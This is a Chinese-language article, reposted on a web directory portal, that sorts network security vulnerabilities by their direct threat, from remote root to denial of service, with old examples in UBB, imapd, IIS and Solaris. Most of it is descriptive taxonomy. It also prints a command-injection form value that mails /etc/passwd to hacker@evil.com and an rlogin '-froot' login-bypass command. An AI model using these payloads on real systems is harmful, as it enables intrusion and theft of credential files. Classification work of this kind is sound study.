计算机网络

今天是：

设为首页

	返首页 \| 电脑技巧 \| 推荐软件 \| 下载软件 \| 音乐欣赏 \| 最新电影 \| 汽车频道 \| 最炫手机 \| 明星美女 \| 热门游戏 \|
	如何做 \| 养生知识 \| 文学小说 \| 自动控制 \| 共享软件 \| 基金股票 \| 国外名站 \| 幽默笑话 \| 两性秘密 \| 旅游休闲 \|
	聊天QQ \| 彩票博彩 \| 星相命理 \| 硬件资讯 \| 电视电台 \| 黑客安全 \| 房产家居 \| 法律律师 \| 饮食医疗 \| 行业网址 \|
	学英语 \| 媒体报刊 \| 歌手歌友 \| 软件编程 \| 网页制作 \| 病毒防治 \| 宠物世界 \| 天文地理 \| 教育教学 \| 政府部门 \|

　　返回---->>>

载入中...

计算机网络系统安全漏洞分类研究

载入中...

本文的目地是为了总结一些东西，解决在试图构造一个漏洞数据库的过程中碰到的主要问题，也就是如何对计算机网络漏洞进行分类的问题。文中的一些想法并不成熟，有些甚至连自己也不满意，权作抛砖引玉，以期与在这方面有深入研究的同仁交流，共同提高完善。
一个计算机网络安全漏洞有它多方面的属性，我认为主要可以用以下几个方面来概括：漏洞可能造成的直接威胁，漏洞的成因，漏洞的严重性，漏洞被利用的方式。以下的讨论将回绕这几个方面对漏洞细分其类。
A．按漏洞可能对系统造成的直接威胁
可以大致分成以下几类，事实上一个系统漏洞对安全造成的威胁远不限于它的直接可能性，如果攻击者获得了对系统的一般用户访问权限，他就极有可能再通过利用本地漏洞把自己升级为管理员权限：

一．远程管理员权限

攻击者无须一个账号登录到本地直接获得远程系统的管理员权限，通常通过攻击以root身份执行的有缺陷的系统守护进程来完成。漏洞的绝大部分来源于缓冲区溢出，少部分来自守护进程本身的逻辑缺陷。
典型漏洞：
１． IMAP4rev1 v10.190版的守护进程imapd的AUTHENTICATE命令存在读入参数时未做长度检查，构造一个精心设计的AUTH命令串，可以溢出imapd的缓冲区，执行指定的命令，由于imapd以root身份运行，从而直接获得机器的root权限。
２． WindowsNT　IIS 4.0的ISAPI DLL对输入的URL未做适当的边界检查，如果构造一个超长的URL，可以溢出IIS (inetinfo.exe)的缓冲区，执行我们指定的代码。由于inetinfo.exe是以local system身份启动，溢出后可以直接得到管理员权限。
３．早期AIX 3.2 rlogind代码存在认证逻辑缺陷，用rlogin victim.com –l –froot，可以直接以root身份登录到系统而无须提供口令。

二．本地管理员权限

攻击者在已有一个本地账号能够登录到系统的情况下，通过攻击本地某些有缺陷的suid程序，竞争条件等手段，得到系统的管理员权限。
典型漏洞：
１． RedHat Linux的restore是个suid程序，它的执行依靠一个中RSH的环境变量，通过设置环境变量PATH，可以使RSH变量中的可执行程序以root身份运行，从而获得系统的root权限。
２． Solaris 7的Xsun程序有suid位，它对输入参数未做有效的边界检查，可以很容易地溢出它的缓冲区，以root身份运行我们指定的代码，从而获得管理员权限。
３．在windows2000下，攻击者就有机会让网络DDE（一种在不同的Windows机器上的应用程序之间动态共享数据的技术）代理在本地系统用户的安全上下文中执行其指定的代码，从而提升权限并完全控制本地机器。

三．普通用户访问权限

攻击者利用服务器的漏洞，取得系统的普通用户存取权限，对UNIX类系统通常是shell访问权限，对Windows系统通常是cmd.exe的访问权限，能够以一般用户的身份执行程序，存取文件。攻击者通常攻击以非root身份运行的守护进程，有缺陷的cgi程序等手段获得这种访问权限。
典型漏洞：
１． UBB是个广泛运行于各种UNIX和Windows系统的论坛程序，用PERL实现，它的5.19以下版本存在输入验证问题，通过提交精心构造的表单内容，可以使UBB去执行shell命令，因为一般的web服务器以nobody身份运行，因此可以得到一个nobody shell。比如提交这样的数据：topic='012345.ubb|mail hacker@evil.com </etc/passwd|'，我们就可以得到系统的passwd文件。
２． RedHat Linux 6.2带的innd 2.2.2.3版新闻服务器，存在缓冲区溢出漏洞，通过一个精心构造的新闻信件可以使innd服务器以news身份运行我们指定的代码，得到一个innd权限的shell。
３． Windows　IIS 4.0-5.0存在Unicode解码漏洞，可以使攻击者利用cmd.exe以guest组的权限在系统上运行程序。相当于取得了普通用户的权限。

四．权限提升

攻击者在本地通过攻击某些有缺陷的sgid程序，把自己的权限提升到某个非root用户的水平。获得管理员权限可以看做是一种特殊的权限提升，只是因为威胁的大小不同而把它独立出来。
典型漏洞：
１． RedHat Linux 6.1带的man程序为sgid man，它存在format bug，通过对它的溢出攻击，可以使攻击者得到man组的用户权限。
２． Solaris 7的write程序为sgid tty，它存在缓冲区溢出问题，通过对它的攻击可以攻击者得到tty组的用户权限。
３． WindowsNT系统中，攻击者能够使系统中其他用户装入一个”特洛化”的porfile，使其他用户执行攻击者的恶意代码，有时甚至是管理员。

五．读取受限文件

攻击者通过利用某些漏洞，读取系统中他应该没有权限的文件，这些文件通常是安全相关的。这些漏洞的存在可能是文件设置权限不正确，或者是特权进程对文件的不正确处理和意外dump core使受限文件的一部份dump到了core文件中。
典型漏洞：
１． SunOS 5.5的ftpd存在漏洞，一般用户可以引起ftpd出错而dump出一个全局可读的core文件，里面有shadow文件的片断，从而使一般用户能读到shadow的部分内容。
２． SuSE 6.2的suid程序pg，对它的配置文件处理存在问题，当把pb.conf链接到特权文件，可以用pb读取那些文件的内容。
３． Oracle 8.0.3 Enterprise Edition for NT 4.0的日志文件全局可读而且为明文，它记录了连接的口令，很可能被攻击者读到。

六．远程拒绝服务

攻击者利用这类漏洞，无须登录即可对系统发起拒绝服务攻击，使系统或相关的应用程序崩溃或失去响应能力。这类漏洞通常是系统本身或其守护进程有缺陷或设置不正确造成的。
１．早期的Linux 和 BSD的tcp/ip堆栈的ip 片断重组模块存在缺陷，攻击通过向系统发出特殊的ip片断包可以使机器崩溃。
２． Windows2000带的Netmeeting 3.01存在缺陷，通过向它发送二进制数据流，可以使服务器的CPU占用达到100%。
３．通过发送一个带有超长参数的USER命令给AnalogX Proxy Server 4.04的ftp端口，可以使这个应用程序崩溃。